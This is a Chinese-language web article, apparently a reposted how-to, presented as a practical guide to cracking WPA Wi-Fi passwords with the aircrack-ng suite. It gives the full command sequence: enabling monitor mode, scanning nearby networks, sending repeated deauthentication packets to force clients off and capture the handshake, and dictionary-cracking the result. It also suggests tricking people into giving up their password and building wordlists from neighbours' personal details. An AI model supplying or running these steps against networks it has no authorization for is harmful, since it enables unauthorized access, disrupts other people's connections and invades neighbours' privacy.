tft每日頭條

 > 生活

 > wifi破解神器aircrack-ng實戰詳解

wifi破解神器aircrack-ng實戰詳解

生活 更新时间:2024-09-09 07:58:12

無線滲透試的工具有很多,在windows下和linux下的工具各有千秋,因在windows下的工具基本都是圖形界面,操作起來比較直觀易懂,在此就不再做過多介紹,本方重點介紹在linux下的一種通用的方法。

首先講一下現行無線滲透試的一般方法和原理。

目前無線滲透試的兩種方法:1、抓握手包,跑包。2、通過WPS進行跑pin碼

當然第2種方法是要求路由器開啟了wps功能。并且要求路由器沒有設置pin防護,其它的方法如路由器漏洞等不在此讨論範圍内。

WEP方式認證的路由器已經很少了,而且這種認證方式不但非常不安全且絕對可破,不再講解,本文隻講WPA認證方式的滲透方法。

其實最有效的取得密碼的方法是直接編個理由過去問!(社工)用我的工具生成密碼即可

工具鍊接我不敢放,不然審核不過啊,大家百度搜下弱口令來破解下,如果熟悉鄰居的

可以用百度搜 “社工密碼字典生成神器” 比較好用的

原理:抓到的包中有密碼的密文,做暴力跑包即可。

工具:aircrack-ng工具包(kali内置),一個支持監聽模式的無線網卡。

使用ifconfig wlan0 up激活你的無線網卡。

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)1

使用airmon-ng check kill結束系統中可能的幹擾進程。

使用airmon-ng start wlan0開啟你網卡的監聽模式。并記住監聽模式的名字。

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)2

第二步:監聽周圍wifi狀态,選擇要破解的無線路由器

使用airodump-ng wlan0mon開始監聽

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)3

第三步:針對要要破解的wifi重新開啟一個監聽記錄,發送斷開命令,等待客戶端重新連接時監聽密碼包。

airodump-ng -w 文件名(自己起一個名,用來保存監聽到的數據) -c 監聽頻道 wlan0mon

打開另一個shell使用

aireplay-ng -0 1 -a 路由器的MAC地址 -c 客戶端的MAC地址 wlan0mon

強制斷開連 接到路由器的設備,以便在它再次連接時捕獲它的認證包。

這裡可以一直多用幾次這個命令,隻要對方斷開重連就可以抓到包了

看看原來的airodump-ng的窗口是否在右上解提示有WPA handshake監聽到

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)4

第四步:跑包測試加密的無線密碼

aircrack-ng -w 準備好的密碼字典 捕獲到的數據包

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)5

wifi破解神器aircrack-ng實戰詳解(wifi破解神器aircrack-ng實戰詳解)6

關注下我

,

更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!

查看全部

相关生活资讯推荐

热门生活资讯推荐

网友关注

Copyright 2023-2024 - www.tftnews.com All Rights Reserved